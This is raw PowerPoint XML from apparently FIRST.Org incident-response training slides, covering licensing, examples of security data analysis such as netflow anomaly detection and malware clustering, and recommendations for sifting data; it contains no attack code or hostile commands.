              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This training material is licensed under Creative Commons Attribution-Non-Commercial-Share-Alike 4.0 (CC BY-NC-SA 4.0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-101600" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>FIRST.Org makes no representation, express or implied, with regard to the accuracy of the information contained in this material and cannot accept any legal responsibility or liability for any errors or omissions that may be made.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-101600" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>All trademarks are property of their respective owners.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-101600" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Permissions beyond the scope of this license may be available at first-licensing@first.org</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99330" name="Shape 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5357BEEE-C66D-C746-9357-9ED801D98794}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="365125"/>
            <a:ext cx="8293100" cy="879475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="45700" rIns="91425" bIns="45700"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Copyright</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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F0F9316-DD8D-524E-88C8-267E8C0F73BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="8228013"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Examples of exploratory analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44034" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F6C97C7-7B16-144E-A723-AEE41DF72261}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="1206500"/>
            <a:ext cx="8693150" cy="2979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29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1pPr>
            <a:lvl2pPr marL="293688" indent="-2921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2pPr>
            <a:lvl3pPr marL="647700" indent="-2159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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Finding fraud campaigns via domain registrations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Netflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> anomaly detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sensor networks (traffic analysis)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>automatically create attack signatures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>identify trends in activities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Monitoring malicious infrastructure &amp; tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>VirusTotal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Intelligence: hunting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Passive Total</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keyword search (web sites, forums, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pastebin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, ...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Malware clustering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Aggregation of vulnerability, incident reports (Taranis)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>… </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:fade thruBlk="1"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8E8107E-BA51-914B-9C05-73C8460A7380}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="8228013"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sifting through data: recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46082" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F8F08F4-62A7-5E40-9652-30D17D817114}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="1601788"/>
            <a:ext cx="8256587" cy="430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29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1pPr>
            <a:lvl2pPr marL="293688" indent="-2921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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Understainding of the dataset is critical</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Choose the right summarization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Experiment, evolve your approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Easier: looking for patterns (known-bad)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>More powerful: anomaly based methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Operationalization can be a challenge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Share new insights with team and community</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:fade thruBlk="1"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B236CDF2-9AFF-4B48-ADA1-9615C20AFCAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="8228013"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Situational Awareness Is Foundational </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48130" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B250CEF8-F4D5-8D4A-A1B3-4EF6D4E37C17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="1206500"/>
            <a:ext cx="8256587" cy="430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29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1pPr>
            <a:lvl2pPr marL="293688" indent="-2921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2pPr>
            <a:lvl3pPr marL="804863" indent="-460375">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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
